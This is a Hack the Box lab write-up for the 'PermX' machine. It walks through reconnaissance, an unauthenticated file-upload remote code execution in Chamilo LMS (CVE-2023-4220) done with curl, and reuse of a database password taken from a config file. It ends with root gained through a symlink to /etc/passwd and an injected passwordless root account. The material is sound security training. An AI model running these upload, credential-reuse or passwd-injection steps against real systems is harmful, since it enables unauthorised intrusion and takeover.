PermX Lab
Hack the Box Penetration Lab
Reconnaissance
First up, a port scan:
┌──(zero㉿zero)-[~]
└─$ rustscan 10.10.11.23
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/zero/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.23:22
Open 10.10.11.23:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.11.23
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:15 PDT
Initiating Ping Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Completed Ping Scan at 10:15, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 10:15
Scanning 10.10.11.23 [2 ports]
Discovered open port 80/tcp on 10.10.11.23
Discovered open port 22/tcp on 10.10.11.23
Completed Connect Scan at 10:15, 0.24s elapsed (2 total ports)
Nmap scan report for 10.10.11.23
Host is up, received syn-ack (0.12s latency).
Scanned at 2024-08-10 10:15:17 PDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 secondsIt looks like there are 2 ports currently open. 22/ssh and 80/http. I also quickly ran an nmap scan to see what URL I could find.
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernelIt looks like there is a website here: permx.htb. After adding this to the hosts file I made my way to it.
Press enter or click to view image in full size
It looks to be some sort of online learning platform! Time to poke around and see what I can find. Poking around the website didn’t yield much, neither did a feroxbuster scan.
┌──(zero㉿zero)-[~]
└─$ feroxbuster -u http://permx.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://permx.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 304c http://permx.htb/css => http://permx.htb/css/
301 GET 9l 28w 304c http://permx.htb/lib => http://permx.htb/lib/
200 GET 434l 827w 7929c http://permx.htb/css/style.css
200 GET 1l 38w 2302c http://permx.htb/lib/easing/easing.min.js
200 GET 8l 81w 5070c http://permx.htb/img/testimonial-4.jpg
200 GET 107l 604w 40660c http://permx.htb/img/course-2.jpg
200 GET 59l 359w 33963c http://permx.htb/img/team-1.jpg
200 GET 94l 537w 57860c http://permx.htb/img/team-3.jpg
200 GET 56l 315w 34720c http://permx.htb/img/course-1.jpg
200 GET 7l 279w 42766c http://permx.htb/lib/owlcarousel/owl.carousel.min.js
200 GET 126l 738w 60325c http://permx.htb/img/cat-3.jpg
200 GET 3l 148w 8156c http://permx.htb/lib/wow/wow.min.js
200 GET 11l 188w 16953c http://permx.htb/lib/animate/animate.min.css
200 GET 162l 1097w 114385c http://permx.htb/img/carousel-1.jpg
200 GET 206l 1251w 90219c http://permx.htb/img/about.jpg
200 GET 542l 1651w 16517c http://permx.htb/lib/wow/wow.js
200 GET 1579l 2856w 23848c http://permx.htb/lib/animate/animate.css
200 GET 6l 3782w 164194c http://permx.htb/css/bootstrap.min.css
301 GET 9l 28w 304c http://permx.htb/img => http://permx.htb/img/
200 GET 5l 69w 4677c http://permx.htb/img/testimonial-3.jpg
200 GET 14l 81w 5311c http://permx.htb/img/testimonial-1.jpg
200 GET 6l 80w 5378c http://permx.htb/img/testimonial-2.jpg
200 GET 112l 581w 45923c http://permx.htb/img/course-3.jpg
200 GET 41l 273w 28085c http://permx.htb/img/team-2.jpg
200 GET 138l 705w 57467c http://permx.htb/img/cat-1.jpg
200 GET 132l 738w 55021c http://permx.htb/img/cat-2.jpg
200 GET 109l 597w 49102c http://permx.htb/img/team-4.jpg
200 GET 158l 719w 58188c http://permx.htb/img/cat-4.jpg
200 GET 239l 1265w 101629c http://permx.htb/img/carousel-2.jpg
301 GET 9l 28w 303c http://permx.htb/js => http://permx.htb/js/
200 GET 6l 64w 2936c http://permx.htb/lib/owlcarousel/assets/owl.carousel.min.css
200 GET 275l 899w 14753c http://permx.htb/contact.html
200 GET 238l 922w 13018c http://permx.htb/testimonial.html
200 GET 7l 158w 9028c http://permx.htb/lib/waypoints/waypoints.min.js
200 GET 208l 701w 10428c http://permx.htb/404.html
200 GET 109l 205w 2698c http://permx.htb/js/main.js
200 GET 6l 41w 936c http://permx.htb/lib/owlcarousel/assets/owl.theme.green.min.css
200 GET 50l 141w 1303c http://permx.htb/lib/owlcarousel/assets/owl.theme.default.css
200 GET 170l 431w 4028c http://permx.htb/lib/owlcarousel/assets/owl.carousel.css
200 GET 35l 179w 5340c http://permx.htb/lib/owlcarousel/assets/ajax-loader.gif
200 GET 50l 141w 1301c http://permx.htb/lib/owlcarousel/assets/owl.theme.green.css
200 GET 6l 41w 936c http://permx.htb/lib/owlcarousel/assets/owl.theme.default.min.css
200 GET 20l 133w 8179c http://permx.htb/lib/owlcarousel/assets/owl.video.play.png
200 GET 275l 912w 14806c http://permx.htb/team.html
200 GET 367l 1362w 20542c http://permx.htb/about.html
200 GET 388l 1519w 22993c http://permx.htb/courses.html
200 GET 587l 2466w 36182c http://permx.htb/index.html
200 GET 0l 0w 0c http://permx.htb/lib/waypoints/links.php
200 GET 587l 2466w 36182c http://permx.htb/
200 GET 168l 960w 4092c http://permx.htb/lib/easing/easing.js
200 GET 23l 172w 1090c http://permx.htb/lib/owlcarousel/LICENSE
200 GET 3275l 9533w 85368c http://permx.htb/lib/owlcarousel/owl.carousel.js
[####################] - 2m 62384/62384 0s found:52 errors:0
[####################] - 2m 62282/62282 503/s http://permx.htb/
[####################] - 6s 62282/62282 9583/s http://permx.htb/css/ => Directory listing
[####################] - 5s 62282/62282 11568/s http://permx.htb/lib/ => Directory listing
[####################] - 6s 62282/62282 9686/s http://permx.htb/lib/easing/ => Directory listing
[####################] - 0s 62282/62282 184813/s http://permx.htb/lib/animate/ => Directory listing
[####################] - 7s 62282/62282 9398/s http://permx.htb/lib/owlcarousel/ => Directory listing
[####################] - 0s 62282/62282 240471/s http://permx.htb/lib/wow/ => Directory listing
[####################] - 6s 62282/62282 9938/s http://permx.htb/js/ => Directory listing
[####################] - 0s 62282/62282 145859/s http://permx.htb/img/ => Directory listing
[####################] - 0s 62282/62282 270791/s http://permx.htb/lib/owlcarousel/assets/ => Directory listing
[####################] - 0s 62282/62282 329534/s http://permx.htb/lib/waypoints/ => Directory listing Time to try and find some sub domains!
┌──(zero㉿zero)-[~]
└─$ ffuf -u http://permx.htb -H "Host:FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 18
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://permx.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.permx.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 18
________________________________________________
www [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 94ms]
lms [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 130ms]
:: Progress: [19966/19966] :: Job [1/1] :: 377 req/sec :: Duration: [0:00:52] :: Errors: 0 ::This actually turned up with something. The subdomain lms seems interesting and when I navigate to it, it leads me here:
Press enter or click to view image in full size
A log-in page. A pretty decent start. Now a quick google to see if I can find any exploits that are freely out there. It looks like there is quite a large known issue with the platform in CVE-2023–4220.
After researching the vulnerability and finding this article, it was pretty clear that I could get a shell uploaded and working with very little effort. The issue lay within a file called bigUpload.php, which allows an attacker to upload and execute a shell without the code sanitising the file’s name.
I created a small test file and tried out the exploit:
┌──(zero㉿zero)-[~]
└─$ curl -F 'bigUploadFile=@bce1.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
┌──(zero㉿zero)-[~]
└─$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/bce1.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)Success! The file I uploaded was able to be executed. Now for the real thing, uploading a reverse shell to gain access.
Infiltration
The reverse shell I ended up using was from pentestmonkey. After gaining access to the system I went ahead and created a stable shell in order to work from. It also looks like there is another user that isn’t root on the system. Someone called mtz.
$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jan 20 2024 .
drwxr-xr-x 18 root root 4096 Jul 1 13:05 ..
drwxr-x--- 7 mtz mtz 4096 Aug 10 22:53 mtzI was a little stuck, so I went digging and saw that sometimes its good to search for configuration files to the login applications. These might contain database locations and other information that can be used to login as other users. Learning a new way to search for specific files was also very handy for the future.
www-data@permx:/$ find /var/www/chamilo -name "configuration.php"
find /var/www/chamilo -name "configuration.php"
/var/www/chamilo/app/config/configuration.php
/var/www/chamilo/plugin/sepe/src/configuration.php
www-data@permx:/$So with the location of a config file, I think it’s time to see what’s inside.
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;Bingo. A database with a password attached. This might give me some more information as to the logins of specific users.
After using find once again, this time with a wildcard, in order to find a database. I came across…nothing. So I just tried to login to mtz with the password above. It worked.
www-data@permx:/$ find /var/www -name "*.db"
find /var/www -name "*.db"
/var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/39.db
/var/www/chamilo/vendor/szymach/c-pchart/resources/barcode/128B.db
www-data@permx:/$ su mtz
su mtz
Password: 03F6lY3uXAP2bkW8
mtz@permx:/$Okay, easier than I thought it would be. But normally the simplest answer is the right one. Right?
Anyway, after logging in I just used cd to get back their own home dir and found the user flag. Along with some other funny files:
mtz@permx:/$ cd
cd
mtz@permx:~$ ls
ls
bro_what_do_you_actually_want linepase.sh oops root.txt user.txt
filetest linpeas.sh password.txt script.sh
mtz@permx:~$ cat password.txt
cat password.txt
asdasdasd:$1$AfQwwXsE$3jxOBWzMH3HO0yUM0oRmI:0:0:root:/root:/bin/bash
mtz@permx:~$ cat root.txt
cat root.txt
is these what you are looking for?🤣🤣🤣
mtz@permx:~$ cat user.txt
cat user.txtNow its time to try and get root access. There at least seems to be a clue here in password.txt. Turns out, a lot of this stuff was junk. Next I went to check what files I could execute with sudo perms. It turns out there is a single file on the system I can do that to.
mtz@permx:~$ sudo -l
sudo -l
Matching Defaults entries for mtz on permx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User mtz may run the following commands on permx:
(ALL : ALL) NOPASSWD: /opt/acl.shThe file acl.sh however is not writeable. So I am unable to edit it right now.
This is where I get stuck most of the time. Getting root access has been a little struggle for me, being new to this I needed a little push in the right direction. I did some research and found out that symlink might be something to proceed with.
Also a small note, whenever I logged back into the machine the next day. For some unknown reason (to me at least) this is missing:
mtz@permx:~$I am still able to type and execute commands, just no clue why it vanishes, it seems very inconsistent.
Back to gaining root access. After reading up about symlink, I was able to link the main passwd file and a temporary file and proceed to gain root access and find the flag.
mtz@permx:~$ ln -s /etc/passwd passwd
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/passwd
mtz@permx:~$ echo "root3::0:0:root3:/root:/bin/bash" >> ./passwd
mtz@permx:~$ su root3
mtz@permx:~$ whoami
rootThe first line links the /etc/passwd file to my own temp file named passwd. The second line executes the only file I have sudo privileges for, which just so happens can change files permissions. The third line just adds a root level account called root3 to my file. After which I just hunted for the root flag!
Conclusion
This box taught me a fair bit. I learnt about linking files, search queries and where to look for stored passwords in databases. I wish I had used linPEAS from the get go, but now I know!
Last updated